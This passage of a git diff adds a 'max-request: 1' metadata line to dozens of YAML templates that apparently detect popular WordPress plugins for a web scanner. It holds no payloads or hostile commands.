   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
